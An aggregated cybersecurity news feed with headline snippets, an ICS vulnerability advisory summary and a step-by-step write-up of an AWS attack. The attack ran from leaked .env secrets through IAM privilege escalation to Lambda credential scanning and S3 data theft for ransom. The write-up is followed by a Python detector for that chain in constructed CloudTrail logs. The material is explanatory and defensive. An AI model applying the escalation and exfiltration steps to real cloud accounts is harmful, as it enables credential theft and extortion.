The European Union’s (EU’s) Network and Information Systems 2 (NIS2) Directive marks a critical advancement in the EU’s digital regulatory policy. Expanding and improving on its predecessor legislation, NIS2 sets out to implement a consolidated, harmonized, and enhanced cybersecurity regime for EU member states. Here’s what you need to know. Scope and Applicability The new […] The post Unlocking Cyber Resilience: How NIS2 Transforms Cyber Threat Intelligence appeared first on ThreatMon Blog.

by ThreatMon

The rebound arrives as heightened levels of malicious activity are targeting firewalls, the largest product segment in the market.

by Cybersecurity Dive

Seven critical-severity vulnerabilities addressed, including an extraordinary (but narrow) Windows Update flaw

by Sophos News


With an immature codebase and a "rather chaotic encryption scheme" prone to failure, the group targets small businesses with custom malware.

by Dark Reading

Torrance, United States / California, 12th September 2024, CyberNewsWire

by Hackread

The Institute for Security and Technology''s UnDisruptable27 project connects technology firms with the public sector to strengthen US cyber defenses in case of attacks on critical infrastructure.

by Dark Reading

The latest step in a journey to serve cybersecurity professionals in other regions of the world.

by Dark Reading

After three years of development, the portable hacking tool gets its first major firmware update - to version 1.0!

by ZDNET Security

We're back with another post about common malware techniques. This time we are talking about setting Windows hooks. This is a simple technique that can be used to log keystrokes or inject code into remote processes. We…

by TrustedSec

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8. The following CVEs are assigned: CVE-2024-29847.

by Zero Day Initiative Advisories

The operators of the mysterious Quad7 botnet are actively evolving by compromising several brands of SOHO routers and VPN appliances by leveraging a combination of both known and unknown security flaws. Targets include devices from TP-LINK, Zyxel, Asus, Axentra, D-Link, and NETGEAR, according to a new report by French cybersecurity company Sekoia. ""The Quad7 botnet operators appear to be

by The Hacker News

A "simplified Chinese-speaking actor" has been linked to a new campaign that has targeted multiple countries in Asia and Europe with the end goal of performing search engine optimization (SEO) rank manipulation. The black hat SEO cluster has been codenamed DragonRank by Cisco Talos, with a victimology footprint scattered across Thailand, India, Korea, Belgium, the Netherlands, and China. "

by The Hacker News

Private Cloud Compute is an entirely new kind of infrastructure that, Apple’s Craig Federighi tells WIRED, allows your personal data to be “hermetically sealed inside of a privacy bubble.”

by WIRED Security News

Key Findings Introduction Check Point Research (CPR) has been closely monitoring a campaign targeting the Iraqi government over the past few months. This campaign features a custom toolset and infrastructure for specific targets and uses a combination of techniques commonly associated with Iranian threat actors operating in the region. The toolset used in this targeted […] The post Targeted Iranian Attacks Against Iraqi Government Infrastructure appeared first on Check Point Research.

by Check Point Research

The recent ransomware attack on the Los Angeles County Superior Court system has gotten a lot of press coverage, and overall, the consensus seems to be that it was devastating. Read more about it in this blog.

by Barracuda

Researchers at Bitdefender warn that law firms are high-value targets for ransomware gangs and other criminal threat actors. Attackers frequently use phishing to gain initial access to an organization’s networks.

by KnowBe4

DragonRank, a Chinese-speaking hacking group, has compromised 30+ Windows servers globally. They exploit IIS vulnerabilities to manipulate SEO…

by Hackread

Intel has issued a security advisory addressing several critical vulnerabilities in the UEFI firmware of certain processors. These flaws, if exploited, could allow privileged users to escalate privileges, launch denial-of-service (DoS) attacks, or even leak sensitive information. Affected users will need to wait for system manufacturers to distribute the necessary firmware updates, which may take … The post Intel’s UEFI Firmware Update Addresses Flaws on Millions of Devices appeared first on CyberInsider.

by Cyber Insider

Attackers mimic Office 365 security alert notifications to lure victims to a phishing site.

by Kaspersky

The Singapore Police Force (SPF) has announced the arrest of five Chinese nationals and one Singaporean man for their alleged involvement in illicit cyber activities in the country. The development comes after a group of about 160 law enforcement officials conducted a series of raids on September 9, 2024, simultaneously at several locations. The six men, aged between 32 and 42, are suspected of

by The Hacker News

AI improves data visualization by enhancing automation, personalization, and collaboration, while introducing techniques like augmented reality and real-time data streams.

by ITPro Today

2024-09-11 17:00:00

SOAR Is Dead, Long Live SOAR

Business intelligence firm Gartner labels security orchestration, automation, and response as "obsolete," but the fight to automate and simplify security operations is here to stay.

by Dark Reading

Imagine a world where you never have to remember another password. Seems like a dream come true for both end users and IT teams, right? But as the old saying goes, "If it sounds too good to be true, it probably is." If your organization is like many, you may be contemplating a move to passwordless authentication. But the reality is that a passwordless security approach comes with its own

by The Hacker News

Key Takeaways

-- Three major advisories from CISA address 17 vulnerabilities across products from LOYTEC Electronics GmbH, Hughes Network Systems, and Baxter.
-- Multiple products are affected by vulnerabilities allowing the cleartext transmission of sensitive data, such as passwords, which could be exploited through Man-in-the-Middle (MitM) attacks.
-- Despite being reported in 2021, these vulnerabilities are only now being publicly disclosed due to the vendor's lack of response. With 629 internet-exposed instances, primarily in Italy and France, the likelihood of exploitation is high. Proofs of concept (PoCs) for these vulnerabilities are publicly available.
-- Other notable vulnerabilities include insufficiently protected credentials and SQL injection, affecting critical infrastructure systems.

Overview

The Cybersecurity and Infrastructure Security Agency (CISA) has highlighted multiple vulnerabilities in ICS products from LOYTEC Electronics GmbH, Hughes Network Systems, and Baxter. Cyble Research & Intelligence Labs (CRIL) reviewed the critical vulnerabilities and threats identified between September 03, 2024, and September 09, 2024. These vulnerabilities span a range of severity levels and impact various products from the three vendors.

Multiple vulnerabilities have been identified in LOYTEC Electronics GmbH's product line. These issues primarily involve the cleartext transmission and storage of sensitive information, along with missing authentication for critical functions and improper access control. Specifically, CVE-2023-46380, CVE-2023-46382, CVE-2023-46383, and CVE-2023-46385 are high-severity vulnerabilities that expose sensitive data such as passwords to interception through Man-in-the-Middle (MitM) attacks. They affect multiple products, including LINX-151, LINX-212, LVIS-3ME12-A1, and various models within the LIOB and L-INX Configurator series.

For instance, CVE-2023-46380 and CVE-2023-46382 both concern cleartext transmission of sensitive information. The risk is significant because an attacker positioned on the network path can intercept and read the data. CVE-2023-46384 and CVE-2023-46386, which involve cleartext storage of sensitive information, compound the risk: an attacker who gains access to the stored data can reuse it. Additionally, CVE-2023-46381 and CVE-2023-46387 cover missing authentication and improper access control. These vulnerabilities allow unauthorized access to critical functions and systems, which can lead to broader compromise if exploited, since the absence of proper authentication means an attacker can bypass security measures and gain unauthorized control.

Hughes Network Systems Vulnerabilities

Hughes Network Systems' WL3000 Fusion Software is affected by two medium-severity vulnerabilities. CVE-2024-39278 and CVE-2024-42495 concern insufficiently protected credentials and missing encryption of sensitive data, respectively. CVE-2024-39278 exposes credentials that are not adequately protected and could be intercepted and misused by attackers; CVE-2024-42495 involves missing encryption for sensitive data, increasing the risk of data breaches and unauthorized access. These vulnerabilities affect versions of the software before 2.7.0.10, so updating to the latest version is the primary mitigation.

Baxter Vulnerabilities

Baxter's Connex Health Portal has been identified with critical and high-severity vulnerabilities. CVE-2024-6795 is a critical SQL injection vulnerability that affects all versions of the Connex Health Portal released before August 30, 2024. SQL injection vulnerabilities allow attackers to execute arbitrary SQL commands on the database, potentially leading to unauthorized data access or modification. In addition, CVE-2024-6796 involves improper access control, which can result in unauthorized access to sensitive application areas. Both vulnerabilities necessitate immediate patching and updates to protect against potential exploits.

The vulnerabilities identified across these ICS products highlight critical risks that need prompt attention. For LOYTEC Electronics GmbH products, the issues primarily involve data security flaws, while Hughes Network Systems and Baxter face vulnerabilities that affect credential protection and data encryption. Organizations using these systems should prioritize applying available patches and updates, implementing robust access controls, and enhancing their security posture to mitigate the risks posed by these vulnerabilities. The majority of the disclosed vulnerabilities are categorized as high severity, emphasizing the need for prompt action and mitigation.

Conclusion

These vulnerabilities highlight critical security issues in ICS products from LOYTEC Electronics GmbH, Hughes Network Systems, and Baxter. Key vulnerabilities include cleartext transmission of sensitive data, SQL injection, and improper access controls, all of which pose significant risks. Organizations must act quickly by applying patches, enhancing access controls, and improving security monitoring. These steps are crucial to mitigating the identified risks and protecting critical infrastructure from exploitation.

Mitigations and Recommendations

-- Implement network segmentation to isolate ICS networks from corporate and internet networks. Use firewalls and DMZs to manage traffic between segments.
-- Apply strong, multifactor authentication and limit access based on the principle of least privilege.
-- Keep ICS hardware and software updated with the latest patches to defend against known vulnerabilities.
-- Deploy monitoring tools to detect suspicious activities and maintain logs for forensic investigations.
-- Develop and test an ICS-specific incident response plan for effective handling of security incidents.
-- Educate staff on ICS-specific threats and best practices, emphasizing the risks of social engineering and untrusted software sources.

Sources

https://www.cisa.gov/news-events/ics-advisories/icsa-24-247-01
https://www.cisa.gov/news-events/ics-advisories/icsa-24-249-01
https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-249-01

The post Major ICS Security Flaws Disclosed in LOYTEC, Hughes, and Baxter Products appeared first on Cyble.

by CYBLE

CVE-2024-38257 is considered “less likely” to be exploited, though it does not require any user interaction or user privileges.

by Cisco Talos Blog

See how the first 2024 US presidential debate between Kamala Harris and Donald Trump influenced Internet traffic patterns compared to the Biden-Trump debate. We also review email trends and observed attack activity.

by Cloudflare

Cybersecurity researchers have uncovered a new set of malicious Python packages that target software developers under the guise of coding assessments. "The new samples were tracked to GitHub projects that have been linked to previous, targeted attacks in which developers are lured using fake job interviews," ReversingLabs researcher Karlo Zanki said. The activity has been assessed to be part of

by The Hacker News

Tired of being tracked online? Try ditching Google for the oddly named DuckDuckGo. Here's why you probably won't switch back.

by ZDNET Security

The Rise of Bug Bounty Programs in S-1 Filings: A New Standard in Corporate Security
Jobert Abma, Wed, 09/11/2024 - 11:20

The Growing Trend
At HackerOne, we’ve observed a notable increase in companies mentioning their bug bounty programs in S-1 filings. Some of the prominent names that have included this information are: Asana, Backblaze, Bill.com, ContextLogic, Cvent, Doximity, Turo, GitLab, GoodRx, Outbrain, Roblox, and Samsara.

"We included our HackerOne bug bounty program as part of our S1-filing to demonstrate our stance on security. Compliance and attestation reports only go so far, and having a dedicated bug bounty program is very valuable for catching vulnerabilities early, which was worth highlighting in our S1." — Jey Balachandran, Chief Technology Officer, Doximity

This list represents a diverse range of industries, from tech and healthcare to finance and travel, indicating that bug bounty programs are becoming a cross-sector security standard.

Why Include Bug Bounty in S-1 Filings
The inclusion of bug bounty programs in S-1 filings is more than just a footnote; it’s a clear message to investors and the public about an organization’s commitment to cybersecurity. It emphasizes that the organization is invested in:
Transparency: By disclosing their bug bounty efforts, organizations demonstrate transparency about their security practices.
Proactive Approach: It shows that these organizations are taking proactive steps to identify and address potential vulnerabilities.
Community Engagement: Bug bounty programs indicate a willingness to engage with the broader security community, leveraging collective expertise.
Risk Management: For investors, this information provides insight into how an organization manages cybersecurity risks.

The Future of Bug Bounty Programs in Corporate Disclosures
We anticipate this trend to continue and even accelerate in the coming years. As cyber threats evolve and become more sophisticated — and investors place greater emphasis on proactive security engagements — organizations will need to showcase their security initiatives in their corporate disclosures.

Governing agencies also play a significant role in the requirements regarding corporate disclosure. As regulators become more attuned to cybersecurity risks and put stricter standards in place for compliance, disclosing such programs may become not just a nice-to-have but a requirement in S-1 filings and other corporate communications.

A Sign of Serious Security Commitment
By including your bug bounty program in your S-1 filing, your organization demonstrates you take security seriously — the security of your investors, customers, employees, and partners. Signal to every involved party that your organization is:
Invested in cutting-edge security practices
Open to external scrutiny and improvement
Committed to ongoing security enhancements
Aligned with industry best practices

In conclusion, the growing trend of organizations mentioning their bug bounty programs in S-1 filings represents a significant shift in corporate security culture. As this trend continues, we expect to see bug bounty programs become an integral part of how companies communicate their security posture to the world. If you’re interested in incorporating bug bounty into your upcoming corporate filing, learn more about bug bounty programs with HackerOne.

by HackerOne

A veritable grab bag of tools used to access critical infrastructure networks are wildly insecure, and they're blobbing together to create a widening attack surface.

by Dark Reading

The threat of ransomware hasn't gone away. But law enforcement has struck a blow by adjusting its tactics and taking out some of the biggest adversaries in the ransomware scene.

by Dark Reading

Ivanti has released a fix for CVE-2024-29847, a deserialization of untrusted data flaw that allows remote code execution in its Endpoint Management solution.

by ThreatDown

The European Court of Justice said Apple must repay about $14.35 billion after reaping illegal tax benefits in Ireland and backed a $2.65 billion antitrust fine on Google.

by ITPro Today

South Africa’s cybersecurity workforce shortage mirrors global trends, but also faces local factors like underinvestment in basic education, underserved communities, digital literacy gaps and challenges with data access.

by KnowBe4

The Better Business Bureau (BBB) has observed a six-fold increase in losses from investment scams over the past three years. The BBB has received more than 4,000 reports of investment scams since 2020, with the median reported loss rising from $1,000 in 2021 to almost $6,000 in 2024.

by KnowBe4

In the "PixHell" attack, sound waves generated by pixels on a screen can transmit information across seemingly impenetrable air gaps.

by Dark Reading

This post explains how our integrations with CrowdStrike Falcon® Next-Gen SIEM allow customers to identify and investigate risky user behavior and analyze data combined with other log sources to uncover hidden threats.

by Cloudflare

Microsoft’s September Patch Tuesday covers 79 Microsoft CVEs and includes four actively exploited zero-days.

by ThreatDown

Cybercriminals target Trump’s digital trading cards using phishing sites, fake domains, and social engineering tactics to steal sensitive…

by Hackread

To maximize the benefits of generative AI, organizations should empower employees to innovate, gain leadership buy-in, promote internal awareness, and measure outcomes.

by ITPro Today

Security researchers from WatchTowr Labs accidentally took over the defunct domain of the WHOIS server for the .MOBI top-level domain (TLD), unveiling a major vulnerability in internet infrastructure. With just $20, the team not only achieved remote code execution (RCE) but also undermined the TLS/SSL certificate validation process for the entire .MOBI domain, effectively gaining … The post $20 Domain Purchase Exposed .MOBI’s Critical Security Flaw appeared first on CyberInsider.

by Cyber Insider

Audit your AD environment for misconfigurations (and attacks) that can lead to severe consequences when exploited by malicious actors.

by Hack The Box Blog

The five-year investment by AWS in data centers will support up to 14,000 jobs.

by ITPro Today

Microsoft on Tuesday disclosed that three new security flaws impacting the Windows platform have come under active exploitation as part of its Patch Tuesday update for September 2024. The monthly security release addresses a total of 79 vulnerabilities, of which seven are rated Critical, 71 are rated Important, and one is rated Moderate in severity. This is aside from 26 flaws that the tech

by The Hacker News

Ivanti has released software updates to address multiple security flaws impacting Endpoint Manager (EPM), including 10 critical vulnerabilities that could result in remote code execution. A brief description of the issues is as follows - CVE-2024-29847 (CVSS score: 10.0) - A deserialization of untrusted data vulnerability that allows a remote unauthenticated attacker to achieve code execution.

by The Hacker News

When a website is compromised, it becomes a potential threat to visitors, leading to its inclusion in Google’s Safe Browsing blacklist…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

Large-Scale Data Exfiltration: Exploiting Secrets in .env Files to Compromise Cloud Accounts and Inflict Severe Business Degradation

Part 1: Breach Analysis

Large-Scale Data Exfiltration Attack: High Level Overview
Researchers from Palo Alto Networks’ Unit 42 have uncovered a major cyber attack targeting cloud environments by exploiting sensitive secrets stored in .env files. The investigation concluded that a compromised AWS environment had been exploited to conduct internet-wide scans across various domains as part of this malicious campaign. Unit 42 discovered that the threat actors had gathered .env files from approximately 110,000 domains, exposing over 90,000 sensitive credentials, including 7,000 related to cloud services used by various organizations.

The following article offers a detailed breakdown of techniques used by attackers in this malicious operation. I will explore the 5 phases of the attack — Initial Access, Account Discovery, Privilege Escalation, Malicious Execution, and Data Exfiltration — along with 12 micro-steps that propel these 5 phases.

Phase 1: Initial Access
Attackers gained initial access to victims’ cloud environments by exploiting exposed secrets in .env files. These files are used by services to access runtime environment variables, which are typically configured differently across development, staging, and production environments based on where the service is deployed.

In production environments, .env files often contain highly sensitive information, such as access tokens, credentials, and API keys. Due to their sensitive nature, .env files are generally excluded from code repositories and are manually configured for specific instances.

.env files are often used to configure web servers that host customer-facing web applications. If improperly configured, attackers can access them publicly via http[s]://<domain>/.env, potentially leading to the retrieval of the .env file contents, which hold sensitive authentication assets used in production.

(Figure: Phase 1 — Initial Access via Exploited Secrets in .env Files)

Phase 2: Account Discovery
After scanning an unsecured web server, the attackers used AWS access keys, obtained from a publicly accessible .env file, to learn more about the compromised account.

AWS access keys are long-term credentials for AWS IAM users, consisting of two parts: an access key ID and a secret access key. Together, these credentials allow authentication of AWS API requests on behalf of the IAM user associated with the access keys. NOTE: AWS access keys are not considered a best practice from a security perspective. Instead, developers are encouraged to use temporary security credentials (such as AWS IAM roles) rather than long-term credentials.

Using the AWS access keys, the threat actors gained a foothold in the AWS environment and sought to learn more about the compromised account. This tactic allowed them to advance their malicious operations — escalating privileges, moving laterally, and extracting valuable data. The attackers made several AWS API calls across several services:

(Figure: Phase 2 — Scanning the Compromised AWS Account)

Step 1 — AWS Security Token Service (STS): Attackers called the STS GetCallerIdentity API to get details about the IAM entity whose AWS access keys are used to invoke the API. It returns the UserID, which represents the unique identifier of the calling entity; the Account, which represents the account that owns the calling entity; and the ARN associated with the calling entity. NOTE: no permissions are required to perform this kind of operation.

Step 2 — AWS Identity & Access Management (IAM): Attackers called the IAM ListUsers API to obtain details about all IAM users in the AWS user pool, along with their IAM attributes. It enabled them to find potential user entities to exploit for future lateral movement.

Step 3 — AWS Simple Storage Service (S3): Attackers called the S3 ListBuckets API to obtain a list of all S3 buckets owned by the calling entity of the request. It enabled them to find potential S3 buckets for future data exfiltration operations. NOTE: a calling entity must have the s3:ListAllMyBuckets permission to perform this operation.

While a basic scan of the compromised account was possible, the threat actors needed administrator access to allocate compute resources and execute code. Therefore, they proceeded to carry out a privilege escalation.

Phase 3: Privilege Escalation
The threat actors wanted to execute code in the compromised account, but the IAM credentials used for initial access had insufficient privileges. Therefore, they performed a privilege escalation to carry out further malicious actions.

Low-privileged IAM principals have limited permissions, restricting their access to critical resources. By escalating privileges, attackers could gain elevated access (targeting the AdministratorAccess AWS-managed IAM policy), allowing them to bypass security controls, move laterally within the cloud environment, and ultimately, exfiltrate data from sensitive S3 buckets.

To escalate their privileges, the threat actors created a new AWS IAM role, assigned it elevated permissions, and assumed the role to obtain elevated IAM credentials.

To better understand this escalation pattern, we first need to take a closer look at the structure of an AWS IAM role.

3.1. Structure of an AWS IAM Role — Trust and Permission Policies
AWS IAM roles are entities that grant access to AWS services based on assigned permissions, similar to IAM users. However, unlike users, roles do not have passwords or access keys. Instead, they provide temporary security credentials to whoever assumes them. This reduces the need to manage users and their long-term credentials, as roles generate temporary credentials whenever required, just in time (JIT), while aiming to provide just enough access (JEA).

AWS IAM roles consist of two components:

(Figure: Appendix A — Structure of an AWS IAM Role)

Trust policies are designed to prevent unauthorized or unintended entities from misusing the IAM role. These policies define the trust relationship between the role and the entities permitted to assume it. Principals allowed to assume the role span IAM users, IAM roles, AWS services, or federated identities from an identity provider (IdP).

Permission policies specify what actions IAM principals can perform on AWS services and resources once they assume the IAM role. NOTE: Multiple permission policies can be attached to an entity to grant varying levels of access rights.

With a clearer understanding of the structure of an AWS IAM role, we can now dive into the AWS IAM privilege escalation technique involving the CreateRole and AttachRolePolicy APIs.

3.2. Escalating Privileges using CreateRole and AttachRolePolicy
To escalate their privileges, the attackers created IAM resources with unrestricted access to the victim’s AWS resources. They created an IAM role named lambda-ex, attached elevated permissions to it, and assumed the role to obtain temporary IAM credentials.

(Figure: Phase 3 — Escalating Privileges via an Elevated IAM Role)

Step 4 — Create a new IAM role: The attackers used the IAM CreateRole API to create a new IAM role named lambda-ex in the compromised AWS account, with an AssumeRolePolicyDocument (trust policy) that granted their own calling identity permission to assume the role.

Step 5 — Attach an elevated IAM policy to the IAM role: The attackers used the IAM AttachRolePolicy API to attach the AWS-managed AdministratorAccess IAM policy to the lambda-ex role, making that policy a part of the role’s permission policy.

Step 6 — Assume the IAM role: The attackers used the STS AssumeRole API with the RoleArn corresponding to the newly created lambda-ex role, which had the AdministratorAccess AWS-managed policy attached, to obtain a set of temporary IAM credentials that provided unrestricted access to AWS resources in the victim’s AWS account.

With IAM credentials granting unrestricted access to the compromised AWS account, the threat actors could execute code by creating an AWS lambda function that executes their malicious code.

Phase 4: Malicious Execution
Using the temporary and elevated IAM credentials, the threat actors created a new lambda function named ex in the AWS region us-east-1. This lambda function executed a bash script that scanned internet-wide domains for exposed .env files, extracted credentials from them, and uploaded the credentials to an S3 bucket under their control.

This technique enabled the attackers to compromise more AWS accounts by using similar attack vectors to exfiltrate and delete S3 objects from the targeted victims’ buckets. They could then upload a ransom note to the emptied buckets, demanding a large fee for returning the exfiltrated data. To execute maliciously, the lambda function had permission to interact with the attackers’ controlled S3 bucket.

NOTE: An AWS lambda function requires specific permissions to execute API actions and access other AWS resources. These permissions are defined in an IAM role called an execution role, which lambda automatically assumes when invoked. The execution role can have a policy attached that specifies the necessary permissions for accessing AWS resources. At a minimum, it must have access to Amazon CloudWatch, as Lambda logs there by default (attaching the AWSLambdaBasicExecutionRole policy satisfies this requirement). Additionally, the role’s trust policy must include the lambda service principal (lambda.amazonaws.com) to allow Lambda to assume the role.

(Figure: Phase 4 — Executing Malicious Code by Launching an AWS Lambda)

Step 7 — Create a new AWS lambda function: The attackers used the AWS Lambda CreateFunction API to create a new lambda function named ex in the compromised AWS account, using an ExecutionRole that granted access to the attackers’ controlled S3 bucket.

Step 8 (Implicit) — Create a new Amazon CloudWatch log group: The creation of an AWS lambda function automatically triggers an Amazon CloudWatch CreateLogGroup API call, which, in this case, creates a log group named /aws/lambda/ex to host log streams generated by the malicious function. This is followed by a CreateLogStream API call, which creates the first log stream within the log group to aggregate runtime log events by date. NOTE: The function’s Amazon CloudWatch logging is always enabled by default, and attackers cannot disable it.

Step 9 — Fetch potential target domains to compromise: The malicious lambda function accessed the attackers’ controlled S3 bucket to fetch a list of potential target domains to scan and attempt to compromise.

Step 10 — Scan for credentials stored in exploitable .env files: For each <domain>, the malicious lambda function attempted to retrieve sensitive secrets from .env files by accessing http[s]://<domain>/.env, reading the contents of the .env file if the web server was misconfigured.

Step 11 — Store sensitive credentials in the controlled AWS S3 bucket: If the malicious lambda function retrieved a domain’s exposed .env file, it parsed the file contents to extract sensitive credentials, and then stored those credentials in a dedicated folder within the controlled AWS S3 bucket.

Phase 5: Data Exfiltration
Using the compromised credentials, the attackers proceeded to exfiltrate and extort sensitive data from Amazon S3 buckets. Their data exfiltration involved unauthorized extraction and removal of data from these storage instances.

The threat actors accessed S3 buckets within the compromised accounts and used the S3 Browser tool to interact with the S3 API for data extraction. After downloading all the files, they deleted them and left a ransom note, informing the owner that their sensitive information was now in the attackers’ possession and would be sold unless a ransom was paid.

(Figure: Appendix B — Moving S3 Objects Between Accounts)

Step 12 — Move S3 Objects Between S3 Buckets Across AWS Accounts: The S3 Browser tool enables transferring data from a source S3 bucket in one AWS account to a destination S3 bucket in another AWS account, whether in the same AWS region or a different one. To do this, the source S3 bucket must grant IAM access through an attached resource policy. An IAM user in the destination account needs to assume a role with GetObject and DeleteObject permissions for the source bucket. Finally, attackers could use the S3 mv command to transfer data from the source S3 bucket to the destination S3 bucket.

NOTE: The S3 Browser tool generates various S3 API calls during its use, which can reveal the S3 buckets accessed by the attackers, regardless of whether S3 object-level logging was enabled.

Epilogue
In the next blog post, I will explain how organizations can proactively detect and remediate these kinds of attacks, and how to remain protected and safe. Stay tuned!

If you have any questions, comments, or feedback, send me a message — I’d be happy to discuss. Additionally, if you found this article useful and wish to stay updated on future research, feel free to follow me here. :)

Large-Scale Data Exfiltration: Exploiting Secrets in .env Files to Compromise Cloud Accounts was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups
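Every API call in Steps 1 through 7 of the write-up above lands in CloudTrail, but the CreateFunction call in Step 7 is made with the temporary credentials from Step 6, so it is logged under the assumed-role session rather than under the leaked access key. The following Python is an added example (not code from the write-up, from Unit 42, or from AWS) that ties the session back to the original key through the access key ID returned in the AssumeRole response and then scores each caller against the chain GetCallerIdentity, ListUsers, ListBuckets, CreateRole, AttachRolePolicy(AdministratorAccess), AssumeRole, CreateFunction. Field names follow the standard CloudTrail record layout; the account ID, ARNs, access key IDs and all records in SAMPLE_EVENTS are constructed for the demo.

```python
"""Flag the recon -> CreateRole -> AttachRolePolicy(AdministratorAccess) -> AssumeRole
-> CreateFunction chain in CloudTrail records. Added example, not the write-up's code;
assumes standard CloudTrail JSON field names. SAMPLE_EVENTS is constructed."""
import json
from collections import defaultdict
from datetime import datetime

ADMIN_POLICY = "arn:aws:iam::aws:policy/AdministratorAccess"
VICTIM_ACCOUNT = "111122223333"  # constructed account ID used by the samples
# (eventSource, eventName prefix); Lambda names carry an API-version suffix in
# CloudTrail (e.g. CreateFunction20150331), hence prefix matching.
CHAIN = [("sts.amazonaws.com", "GetCallerIdentity"), ("iam.amazonaws.com", "ListUsers"),
         ("s3.amazonaws.com", "ListBuckets"), ("iam.amazonaws.com", "CreateRole"),
         ("iam.amazonaws.com", "AttachRolePolicy"), ("sts.amazonaws.com", "AssumeRole"),
         ("lambda.amazonaws.com", "CreateFunction")]


def stage_of(event):
    """Index of the chain stage an event belongs to, or None."""
    for i, (source, prefix) in enumerate(CHAIN):
        if event.get("eventSource") == source and event.get("eventName", "").startswith(prefix):
            return i
    return None


def _ts(event):
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def analyze(events, window_minutes=60):
    """Return {caller_arn: finding}. Credentials minted by AssumeRole are tied back to the
    caller via responseElements.credentials.accessKeyId, so the CreateFunction call made
    under the new role is attributed to the key that started the chain."""
    session_owner = {}  # assumed-role access key -> original caller ARN
    by_caller = defaultdict(list)
    for ev in sorted(events, key=_ts):
        ident = ev.get("userIdentity", {})
        caller = session_owner.get(ident.get("accessKeyId"), ident.get("arn", "unknown"))
        by_caller[caller].append(ev)
        if ev.get("eventName") == "AssumeRole":
            key = ((ev.get("responseElements") or {}).get("credentials") or {}).get("accessKeyId")
            if key:
                session_owner[key] = caller
    findings = {}
    for caller, evs in by_caller.items():
        stages, admin_roles = set(), []
        for ev in evs:
            stage = stage_of(ev)
            if stage is None:
                continue
            stages.add(stage)
            params = ev.get("requestParameters") or {}
            if ev["eventName"] == "AttachRolePolicy" and params.get("policyArn") == ADMIN_POLICY:
                admin_roles.append(params.get("roleName"))
        span = (_ts(evs[-1]) - _ts(evs[0])).total_seconds() / 60
        findings[caller] = {"stages": sorted(stages), "admin_roles": admin_roles,
                            # Recon alone is routine; recon plus self-granted admin in one window is the signal.
                            "suspicious": span <= window_minutes and bool(admin_roles) and len(stages) >= 5}
    return findings


def _ev(minute, source, name, arn, key, **extra):
    """Minimal constructed CloudTrail record for the samples below."""
    rec = {"eventTime": f"2024-08-01T10:{minute:02d}:00Z", "eventSource": source, "eventName": name,
           "userIdentity": {"arn": arn, "accessKeyId": key}, "recipientAccountId": VICTIM_ACCOUNT}
    return {**rec, **extra}


BOT = f"arn:aws:iam::{VICTIM_ACCOUNT}:user/deploy-bot"  # identity behind the key leaked via /.env
TRUST = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": {"AWS": BOT}, "Action": "sts:AssumeRole"}]})
SAMPLE_EVENTS = [
    _ev(0, "sts.amazonaws.com", "GetCallerIdentity", BOT, "AKIAEXAMPLE0000001"),
    _ev(1, "iam.amazonaws.com", "ListUsers", BOT, "AKIAEXAMPLE0000001"),
    _ev(2, "s3.amazonaws.com", "ListBuckets", BOT, "AKIAEXAMPLE0000001"),
    _ev(3, "iam.amazonaws.com", "CreateRole", BOT, "AKIAEXAMPLE0000001",
        requestParameters={"roleName": "lambda-ex", "assumeRolePolicyDocument": TRUST}),
    _ev(4, "iam.amazonaws.com", "AttachRolePolicy", BOT, "AKIAEXAMPLE0000001",
        requestParameters={"roleName": "lambda-ex", "policyArn": ADMIN_POLICY}),
    _ev(5, "sts.amazonaws.com", "AssumeRole", BOT, "AKIAEXAMPLE0000001",
        requestParameters={"roleArn": f"arn:aws:iam::{VICTIM_ACCOUNT}:role/lambda-ex"},
        responseElements={"credentials": {"accessKeyId": "ASIAEXAMPLE0000002"}}),
    _ev(6, "lambda.amazonaws.com", "CreateFunction20150331",
        f"arn:aws:sts::{VICTIM_ACCOUNT}:assumed-role/lambda-ex/ex-session", "ASIAEXAMPLE0000002",
        requestParameters={"functionName": "ex"}),
    _ev(7, "s3.amazonaws.com", "ListBuckets", f"arn:aws:iam::{VICTIM_ACCOUNT}:user/ops-admin",
        "AKIAEXAMPLE0000003"),  # routine bucket listing by a human admin: no escalation, not flagged
]

if __name__ == "__main__":
    for caller, finding in analyze(SAMPLE_EVENTS).items():
        print("ALERT" if finding["suspicious"] else "ok   ", caller, finding)
```

Run against the constructed sample, the deploy-bot key is flagged with all seven stages and the lambda-ex role in admin_roles, while the ops-admin user, who only listed buckets, is not. The access-key correlation is the part worth keeping: without it the CreateFunction event appears under a fresh assumed-role ARN and the chain looks like two unrelated identities. The window and the five-stage threshold are illustrative choices; in a real deployment a single CreateRole followed by AttachRolePolicy with AdministratorAccess from a long-term access key should already page someone, and the assumeRolePolicyDocument recorded on CreateRole can additionally be checked for principals outside the account.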

Check Point Software has been named a Leader in GigaOm’s latest Radar Report for Security Policy as Code. Check Point’s CloudGuard, part of the Infinity Platform, offers comprehensive code security capabilities designed to help businesses defend against the ever-changing landscape of cyber threats. “At Check Point, we recognise the challenges in safeguarding digital assets in […] The post Check Point Software Recognised as a Leader in GigaOm Radar Report for Security Policy as Code appeared first on IT Security Guru.

by IT Security Guru

With its Xanadu release, ServiceNow expands its Now Platform with more automation and AI-driven capabilities.

by ITPro Today

An attack dubbed "WordDrone" that uses an old flaw to install a backdoor could be related to previously reported cyber incidents against Taiwan's military and satellite industrial supply chain.

by Dark Reading

As the volume and complexity of vulnerabilities grows, organizations are struggling to manage and mitigate the security defects. 

by Cybersecurity Dive

We detail a rare phishing mechanism using a refresh entry in the HTTP response header for stealth redirects to malicious pages, affecting finance and government sectors. The post Phishing Pages Delivered Through Refresh HTTP Response Header appeared first on Unit 42.

by Palo Alto Networks - Unit42

This week, Cato Networks, global SASE provider, announced the following appointments to the company’s Board of Directors, effective October 1, 2024. – Eyal Waldman, chairman of Waldo Holdings and former CEO of Mellanox Technologies – Gili Iohan, general partner at ION Crossover Partners and former CFO of Varonis “We welcome Eyal and Gili as new […] The post Cato Networks Expands Board of Directors with Two Industry Leaders appeared first on IT Security Guru.

by IT Security Guru

As attacks on satellites rise with nation-state conflicts, the South Asian nation joins other space-capable countries in doubling down on cybersecurity.

by Dark Reading

